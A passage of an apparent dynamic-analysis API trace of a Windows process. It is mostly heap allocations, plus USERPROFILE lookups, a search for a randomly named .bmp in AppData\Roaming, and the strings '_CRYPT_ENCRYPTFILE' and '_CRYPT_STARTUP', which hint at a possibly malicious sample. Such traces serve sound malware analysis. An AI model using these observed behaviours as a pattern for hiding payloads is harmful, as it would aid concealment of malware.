lpString2="Fixed.", cchCount2=6) returned 3 [0228.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wDqnX6.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0228.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DqnX6.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0228.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qnX6.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0228.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nX6.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0228.781] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X6.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0228.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0228.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040e0 [0228.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0228.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040e0 | out: hHeap=0x970000) returned 1 [0228.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0228.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0228.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0228.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0228.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0228.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0228.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0228.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0228.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0228.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0228.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0228.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0228.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0228.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0228.781] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0228.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0228.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0228.781] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0228.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0228.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0228.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0228.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c48 [0228.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0228.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0228.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0228.782] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0228.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0228.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0228.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0228.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0228.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0228.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0228.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0228.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0228.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0228.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0228.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0228.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0228.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0228.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0228.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0228.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0228.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cb8 [0228.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0228.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0228.782] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0228.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0228.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0228.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0228.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0228.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0228.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0228.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0) returned 0x2e564e0 [0228.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0228.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0228.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0228.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0228.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0228.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0228.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0228.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0228.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0228.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0228.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0228.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0228.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b28 [0228.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0228.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0228.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0228.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503e0 [0228.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0228.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0228.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0228.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0228.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0228.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0228.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0228.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0228.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0228.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0228.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0228.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04038 [0228.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0228.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0228.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0228.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0228.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0228.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0228.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0228.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0228.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0228.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0228.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0228.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0228.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0228.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0228.784] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0228.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0228.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0228.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0228.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0228.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0228.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0228.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0228.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0228.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0228.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0228.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0228.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0228.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0228.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0228.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0228.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f788 [0228.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0228.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0228.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0228.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0228.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0228.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0228.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0228.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0228.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0228.787] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0228.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0228.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0228.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0228.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0228.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0228.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0228.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0228.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0228.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0228.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0228.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0228.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0228.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0228.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0228.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0228.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0228.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0228.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0228.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0228.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0228.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0228.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0228.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0228.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0228.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0228.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0228.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0228.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0228.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0228.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0228.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0228.788] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0228.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0228.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0228.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0228.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0228.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0228.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0228.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0228.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0228.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0228.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0228.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0228.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0228.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0228.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0228.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0228.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0228.789] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0228.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0228.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0228.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0228.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0228.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0228.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0228.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0228.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0228.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0228.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0228.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7b0 [0228.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0228.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0228.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0228.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0228.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0228.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0228.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0228.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0228.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0228.790] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/EdsWI8rB4BywDqnX6.bmp", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfafc9f30, ftCreationTime.dwHighDateTime=0x1d5ed64, ftLastAccessTime.dwLowDateTime=0xe0f48730, ftLastAccessTime.dwHighDateTime=0x1d5e56f, ftLastWriteTime.dwLowDateTime=0xe0f48730, ftLastWriteTime.dwHighDateTime=0x1d5e56f, nFileSizeHigh=0x0, nFileSizeLow=0x7028, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="EdsWI8rB4BywDqnX6.bmp", cAlternateFileName="EDSWI8~1.BMP")) returned 0xa876d0 [0228.790] FindClose (in: hFindFile=0xa876d0 | out: hFindFile=0xa876d0) returned 1 [0228.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0228.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0228.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0228.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0228.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0228.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0228.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0228.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0228.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0228.791] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0228.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0228.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0228.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0228.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0228.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0228.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0228.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0228.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0228.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0228.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0228.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0228.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0228.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0228.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0228.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0228.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0228.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0228.792] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0228.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0228.792] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0228.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0228.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0228.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) 